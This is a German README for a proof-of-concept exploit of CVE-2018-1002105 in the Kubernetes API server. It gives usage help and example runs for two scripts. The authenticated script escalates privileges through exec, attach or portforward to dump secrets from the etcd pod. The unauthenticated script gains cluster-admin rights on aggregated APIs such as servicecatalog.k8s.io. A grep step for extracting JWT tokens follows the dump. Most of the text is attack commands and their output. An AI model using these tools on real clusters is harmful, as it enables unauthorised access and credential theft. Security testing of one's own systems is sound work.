
Proof-of-concept-Exploit für CVE-2018-1002105, der auf den Kubernetes-API-Server abzielt. Unterstützt authentifizierte und nicht authentifizierte Privilegieneskalation, um Geheimnisse auszulesen oder Cluster-Admin-Rechte über exec-, portforward- oder attach-Methoden zu erlangen.
Proof-of-Concept-Exploit für CVE-2018-1002105. Der aktuelle Exploit erfordert create- und get-Berechtigungen für pods und pods/exec. Unterstützung für portforward und attach wurde hinzugefügt, die ähnliche Berechtigungen erfordern.
Das aktuelle PoC extrahiert die Secrets aus dem Standard-etcd-kubernetes-Pod.
Das PoC in Aktion:
usage: poc.py [-h] --target TARGET --jwt TOKEN [--namespace NAMESPACE] --pod
POD --method {exec,portforward,attach}
[--privileged-namespace PNAMESPACE] [--privileged-pod PPOD]
[--container CONTAINER] [--command COMMAND]
[--filename FILENAME]
PoC for CVE-2018-1002105.
optional arguments:
-h, --help show this help message and exit
required arguments:
--target TARGET, -t TARGET
API server target:port
--jwt TOKEN, -j TOKEN
JWT token for service account
--namespace NAMESPACE, -n NAMESPACE
Namespace with method access
--pod POD, -p POD Pod with method access
--method {exec,portforward,attach}, -m {exec,portforward,attach}
optional arguments:
--privileged-namespace PNAMESPACE, -s PNAMESPACE
Target namespace
--privileged-pod PPOD, -e PPOD
Target privileged pod
--container CONTAINER, -c CONTAINER
Target container
--command COMMAND, -x COMMAND
Command to execute
--filename FILENAME, -f FILENAME
File to save output to
Beispiel:
$ ./poc.py -t 10.0.2.15:6443 --jwt [token] -p [pod] -f etcd.out -m attach
[*] Building pipe using attach...
[+] Pipe opened :D
[*] Attempting code exec on etcd-kubernetes/etcd
[*] Writing output to etcd.out ....
[+] Done!
Prüfen auf Tokens:
$ grep -air eyJ etcd.db
Das nicht authentifizierte PoC ermöglicht eine Privilegienausweitung im Kontext der exponierten API. Abhängig von den Funktionen der API könnte es möglich sein, Code-Ausführung auf Pods zu erreichen. Diese Demo nutzt den Fehler derzeit aus, um Cluster-Admin-Rechte auf der servicecatalog.k8s.io-API zu erlangen. Dieser Exploit sollte auch für metrics.k8s.io oder jede andere über die aggregierte Schicht exponierte API funktionieren.
Das PoC in Aktion:
usage: unauth_poc.py [-h] --target TARGET [--api-base BASE]
[--api-target TARGET_API] [--api-version VERSION]
[--json] [--filename FILENAME]
Unauthenticated PoC for CVE-2018-1002105
optional arguments:
-h, --help show this help message and exit
required arguments:
--target TARGET, -t TARGET
API server target:port
--api-base BASE, -b BASE
Target API name i.e. "servicecatalog.k8s.io"
--api-target TARGET_API, -u TARGET_API
API to access i.e. "clusterservicebrokers"
optional arguments:
--api-version VERSION, -a VERSION
API version to use i.e. "v1beta1"
--json, -j Print json output
--filename FILENAME, -f FILENAME
File to save output to
Beispiel:
$ ./unauth_poc.py -t 10.0.2.15:6443 --json -f api.out
[*] Building pipe ...
[+] Pipe opened :D
[*] Attempting to access url
[+] Pipe opened :D
[*] Writing output to api.out ....
[+] Done!